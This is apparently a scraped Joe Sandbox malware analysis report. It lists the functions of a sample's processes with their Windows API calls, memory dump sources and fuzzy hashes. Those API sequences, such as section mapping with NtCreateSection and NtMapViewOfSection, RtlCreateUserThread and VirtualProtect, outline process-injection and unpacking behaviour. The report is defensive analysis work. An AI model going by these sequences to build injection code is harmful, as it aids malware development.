Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Function 02BA003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BA024D

Strings

cess, xrefs: 02BA018D
kernel32.dll, xrefs: 02BA008F, 02BA0095

Memory Dump Source

Source File: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2ba0000_A869.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b8fad2149ce1c72ead298f70c1fe5a9f46f924ad6fd9cff4a247a45f8ac33ccc
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 51527974A05229DFDB64CF68C994BACBBB1BF09304F1484D9E94DAB351DB30AA94CF14

Function 00415910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B19CE8), ref: 004159EF
GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 00415A2C
VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 00415A4B

Strings

, xrefs: 00415955

Memory Dump Source

Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_A869.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction ID: 9f4e34dfc4b6fe9394a1db25d0a6d7b53828682d58b9ddec5cea0b2bad73ce3c
Opcode Fuzzy Hash: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction Fuzzy Hash: 3D3167149487C0CAE301CB78F8547823FA2EB25744F44847CD189873A5EFBA1524D7EE

Function 02C1A683 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C1A6AB
Module32First.KERNEL32(00000000,00000224), ref: 02C1A6CB

Memory Dump Source

Source File: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c17000_A869.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 3074d2fe610f1fac76bff5bb135aba6031ac95f98f0ef69984cf2f0287dab1bc
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D0F0F6321017117FD7203BF89C8EB6EB2E8AF8A224F100128E643D15C0CB70E9059A61

Function 02BA0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02BA0223,?,?), ref: 02BA0E19
SetErrorMode.KERNELBASE(00000000,?,?,02BA0223,?,?), ref: 02BA0E1E

Memory Dump Source

Source File: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2ba0000_A869.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 6caa47b8ee7731fb4f42fe3c73b0a19dde9cf11d5998d059322002e2c43fd413
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: AFD0123154512877DB003A94DC09BCD7B1CDF09B66F008451FB0DD9080C770954046E5

Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F

Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F

Function 02C1A342 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C1A393

Memory Dump Source

Source File: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c17000_A869.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 56066f9a633f585d50299a7d86ec2fc093691c4f2d305a1fe8a422ef361aacd7
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 9E113C79A40208FFDB01DF98C985E98BBF5AF08351F058095F9489B361D371EA50EF80

Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B

Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

Function 004158E0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B19CE4,00415F7B), ref: 004158E8

Memory Dump Source

Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_A869.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction ID: d7b87d211da148203f6924bb85ac0980f9e485e76abd759aca5fb629b3ee17cc
Opcode Fuzzy Hash: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction Fuzzy Hash: D3B092B0DC46409BD7008BA0A814B513AA4E308742F404461F505C2180DA2014208F14

Non-executed Functions

Function 00401E65 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_A869.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90

Function 00415AE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415B11
WritePrivateProfileStringA.KERNEL32(00418384,0041835C,00418330,0041830C), ref: 00415B35
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B3D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415B7D
GetComputerNameW.KERNEL32(?,?), ref: 00415B91
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415B9F
OpenJobObjectA.KERNEL32(00000000,00000000,004183B4), ref: 00415BAE
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415BBF

Strings

-, xrefs: 00415BCC

Memory Dump Source

Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_A869.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: b7bb9a5b8577f05c9444bb152fbeed06ee10d6e36786bb58eab085b6d1570c50
Instruction ID: c8ce66b9030aa5128248987ed1e6c42ca1346a4c7388fc80dbaa79af2878fbf1
Opcode Fuzzy Hash: b7bb9a5b8577f05c9444bb152fbeed06ee10d6e36786bb58eab085b6d1570c50
Instruction Fuzzy Hash: E721FB31A88348EBD7209F94DD85FDD7B70FB4CB51F1440A9F649AA1C0CAB42AC48B5D

Function 00415C00 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415C34
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415C4F
HeapDestroy.KERNEL32(00000000), ref: 00415C6E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415C76

Memory Dump Source

Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_A869.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 40611bbb9540bf7089aa309a5be8a53c8ce5539108cd5addca110bf7d1443001
Instruction ID: dfb90add5c3ca1356a5d467ff049daf0d79d45e69348a2a8c246a34d756d5ef6
Opcode Fuzzy Hash: 40611bbb9540bf7089aa309a5be8a53c8ce5539108cd5addca110bf7d1443001
Instruction Fuzzy Hash: F901A770A84604DBD750EBB4ED457DA77B8FB0C746F404076F60AD7280DA7419548B96

Analysis Process: ajvrjraPID: 2080, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	18.9%
Signature Coverage:	0%
Total number of Nodes:	175
Total number of Limit Nodes:	10

Executed Functions

Function 00415C90 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415D62
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D7B
FindAtomW.KERNEL32(00000000), ref: 00415D82
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D8A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415DA2
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415DC9
MoveFileW.KERNEL32(00000000,00000000), ref: 00415DD1
GetVersionExW.KERNEL32(?), ref: 00415DDE
DisconnectNamedPipe.KERNEL32(?), ref: 00415DF1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415E36
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415E45
LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415E5B
PulseEvent.KERNEL32(00000000), ref: 00415E6B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415E94
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415EC5
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415ED6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415EDE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415F1E
GetFileAttributesA.KERNEL32(00000000), ref: 00415F25
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415F2B
GetBinaryType.KERNEL32(0041842C,?), ref: 00415F3D
LoadLibraryA.KERNELBASE(00418438), ref: 00415FC2

Strings

k`, xrefs: 00415FF3
}$, xrefs: 00416017

Memory Dump Source

Source File: 00000009.00000002.2767929246.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_ajvrjra.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
Instruction ID: 500cb7f68f8a5735401a0a6ba47bc000e865cb3074ff61a672bf7834970157e8
Opcode Fuzzy Hash: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
Instruction Fuzzy Hash: 96A1E271845A24DBC720DB65EC58ADF7B78EF8D351F40406AF50AA7290DB381A81CBED

Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
